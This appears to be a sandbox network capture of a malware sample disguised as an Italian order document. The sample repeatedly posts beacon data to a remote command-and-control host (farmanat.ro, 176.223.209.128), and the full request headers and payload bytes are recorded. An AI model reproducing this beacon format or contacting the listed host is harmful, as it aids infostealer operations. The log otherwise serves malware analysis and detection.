Nov 25, 2021 10:49:37.955485106 CET	6555	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:37.989485979 CET	6555	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:38.039424896 CET	6555	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
172	192.168.11.20	50013	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:38.463778019 CET	6556	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:38.497083902 CET	6556	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:38.545901060 CET	6557	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
173	192.168.11.20	50014	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:38.976726055 CET	6557	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:39.010889053 CET	6558	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:39.060950041 CET	6558	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
174	192.168.11.20	50015	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:39.500286102 CET	6559	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:39.533838034 CET	6559	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:39.590012074 CET	6559	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
175	192.168.11.20	50016	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:40.035713911 CET	6560	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:40.069422007 CET	6560	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:40.120172977 CET	6561	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
176	192.168.11.20	50017	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:40.546892881 CET	6561	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:40.581239939 CET	6561	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:40.630784988 CET	6562	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
177	192.168.11.20	50018	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:41.083152056 CET	6563	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:41.117058992 CET	6563	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:41.170712948 CET	6563	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
178	192.168.11.20	50019	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:41.586026907 CET	6564	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:41.619617939 CET	6564	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:41.671798944 CET	6565	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
179	192.168.11.20	50020	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:42.108783960 CET	6565	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:42.143014908 CET	6565	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:42.223660946 CET	6566	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.11.20	49853	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:12.876249075 CET	6330	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:12.909812927 CET	6330	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:12.958539963 CET	6331	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.11.20	50021	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:42.628957987 CET	6567	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:42.662528038 CET	6567	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:42.714049101 CET	6567	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.11.20	50022	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:43.093220949 CET	6568	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:43.127218008 CET	6568	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:43.177671909 CET	6569	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.11.20	50023	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:43.580123901 CET	6569	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:43.613445997 CET	6569	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:43.662293911 CET	6570	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.11.20	50024	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:44.062925100 CET	6571	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:44.097121954 CET	6571	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:44.146981955 CET	6571	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.11.20	50025	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:44.593789101 CET	6572	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:44.627295971 CET	6572	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:44.682646036 CET	6572	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.11.20	50026	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:45.081557035 CET	6573	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:45.114862919 CET	6573	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:45.164135933 CET	6574	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.11.20	50027	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:45.567534924 CET	6575	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:45.601788998 CET	6575	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:45.651731968 CET	6575	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.11.20	50029	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:46.099241018 CET	6582	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:46.133419991 CET	6583	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:46.189888954 CET	6583	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.11.20	50030	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:46.560009003 CET	6584	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:46.594052076 CET	6584	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:46.644582987 CET	6584	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.11.20	50031	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:47.093239069 CET	6585	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:47.126807928 CET	6585	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:47.183104992 CET	6586	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.11.20	49854	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:13.646368980 CET	6331	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:13.680684090 CET	6332	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
